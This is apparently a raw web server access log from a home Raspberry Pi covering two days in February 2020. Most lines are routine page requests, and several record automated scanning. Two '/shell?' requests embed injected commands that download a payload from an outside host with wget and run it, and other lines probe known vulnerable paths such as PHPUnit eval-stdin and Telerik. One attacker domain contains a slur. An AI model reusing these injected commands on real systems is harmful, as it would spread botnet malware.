Mon Feb 10 06:25:06 MST 2020 06:25:06 up 9 days, 18:28, 1 user, load average: 0.46, 0.26, 0.38 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT pi tty7 :0 31Jan20 9days 7:39 1.34s /usr/bin/lxsession -s LXDE-pi -e LXDE 185.167.172.80 - - [10/Feb/2020:13:39:26 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7" 178.22.112.62 - - [10/Feb/2020:14:34:01 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" 191.222.134.15 - - [10/Feb/2020:14:37:28 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36" 185.99.169.2 - - [10/Feb/2020:15:32:51 +0000] "GET / HTTP/1.1" 400 0 "" "" 5.101.0.209 - - [10/Feb/2020:16:05:05 +0000] "POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 201.0.94.173 - - [10/Feb/2020:16:09:14 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36" 186.208.100.3 - - [10/Feb/2020:16:47:32 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" 62.86.25.151 - - [10/Feb/2020:16:47:40 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 168.227.119.169 - - [10/Feb/2020:17:27:01 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" 109.72.196.208 - - [10/Feb/2020:17:27:21 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36" 143.255.243.170 - - [10/Feb/2020:17:44:30 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36" 222.186.19.221 - - [10/Feb/2020:17:56:11 +0000] "UNKNOWN HTTP/1.1" 400 0 "" "" 194.50.254.224 - - [10/Feb/2020:17:58:21 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36" 159.255.160.226 - - [10/Feb/2020:18:09:10 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" 171.36.135.252 - - [10/Feb/2020:18:15:27 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 113.128.105.237 - - [10/Feb/2020:18:15:28 +0000] "HEAD / HTTP/1.1" 200 0 "" "Mozilla/5.01732016 Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0" 151.73.101.228 - - [10/Feb/2020:18:45:04 +0000] "GET /shell?cd+/tmp;rm+-rf+.j;wget+http:/\/91.92.66.124/..j/.j;chmod+777+.j;sh+.j;echo+DONE HTTP/1.1" 400 0 "" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36" 123.160.234.167 - - [10/Feb/2020:19:09:48 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36" 124.235.138.129 - - [10/Feb/2020:19:09:49 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36" 123.191.143.80 - - [10/Feb/2020:19:09:50 +0000] "UNKNOWN HTTP/1.1" 400 0 "" "" 175.184.165.31 - - [10/Feb/2020:19:09:50 +0000] "UNKNOWN HTTP/1.1" 400 0 "" "" 175.184.167.78 - - [10/Feb/2020:19:09:50 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36" 171.36.129.47 - - [10/Feb/2020:19:09:51 +0000] "UNKNOWN HTTP/1.1" 400 0 "" "" 175.152.110.105 - - [10/Feb/2020:19:09:51 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36" 124.225.43.7 - - [10/Feb/2020:19:09:52 +0000] "GET /english/ HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36" 222.82.51.12 - - [10/Feb/2020:19:09:55 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36" 185.106.30.26 - - [10/Feb/2020:19:31:39 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7" 78.179.237.153 - - [10/Feb/2020:19:31:54 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" 41.39.1.121 - - [10/Feb/2020:21:16:19 +0000] "GET / HTTP/1.1" 400 0 "" "" 5.188.210.101 - - [10/Feb/2020:23:31:13 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 5.188.210.101 - - [10/Feb/2020:23:31:18 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 5.188.210.101 - - [10/Feb/2020:23:31:23 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 5.188.210.101 - - [10/Feb/2020:23:31:39 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 5.188.210.101 - - [10/Feb/2020:23:31:45 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 5.188.210.101 - - [10/Feb/2020:23:31:51 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 5.188.210.101 - - [10/Feb/2020:23:33:18 +0000] "GET /echo.php HTTP/1.1" 404 0 "https://www.google.com/" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36" 51.89.229.158 - - [10/Feb/2020:23:56:05 +0000] "UNKNOWN UNKNOWN" 0 0 "" "" 51.89.229.158 - - [10/Feb/2020:23:56:05 +0000] "HEAD /robots.txt HTTP/1.0" 200 0 "" "" 5.188.206.50 - - [11/Feb/2020:01:12:34 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 128.14.134.170 - - [11/Feb/2020:01:13:34 +0000] "GET /Telerik.Web.UI.WebResource.axd?type=rau HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 " 114.40.112.37 - - [11/Feb/2020:02:54:46 +0000] "GET /shell?cd+/tmp;rm+-rf+*;wget+http://jhasdjahsdjasfkdaskdfasBOT.niggacumyafacenet.xyz/jaws;sh+/tmp/jaws HTTP/1.1" 404 0 "" "Hello, world" 114.40.112.37 - - [11/Feb/2020:02:54:46 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 94.23.31.18 - - [11/Feb/2020:05:21:53 +0000] "GET / HTTP/1.1" 200 25000 "" "python-requests/2.22.0" 192.241.238.11 - - [11/Feb/2020:05:52:23 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 zgrab/0.x" 92.118.160.13 - - [11/Feb/2020:07:00:07 +0000] "GET / HTTP/1.0" 200 25000 "" "NetSystemsResearch studies the availability of various services across the internet. Our website is netsystemsresearch.com" 223.149.247.223 - - [11/Feb/2020:08:11:53 +0000] "POST /HNAP1/ HTTP/1.0" 404 0 "" "" 51.15.15.191 - - [11/Feb/2020:08:49:51 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 60.191.66.222 - - [11/Feb/2020:09:24:35 +0000] "GET /manager/html HTTP/1.1" 404 0 "" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; WOW64; Trident/6.0)" 2.136.134.161 - - [11/Feb/2020:09:25:43 +0000] "GET / HTTP/1.1" 400 0 "" "" 194.180.224.249 - - [11/Feb/2020:11:00:04 +0000] "GET / HTTP/1.1" 200 25000 "" "" Tue Feb 11 06:25:06 MST 2020 06:25:06 up 10 days, 18:28, 1 user, load average: 0.49, 0.25, 0.24 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT pi tty7 :0 31Jan20 10days 8:14 1.34s /usr/bin/lxsession -s LXDE-pi -e LXDE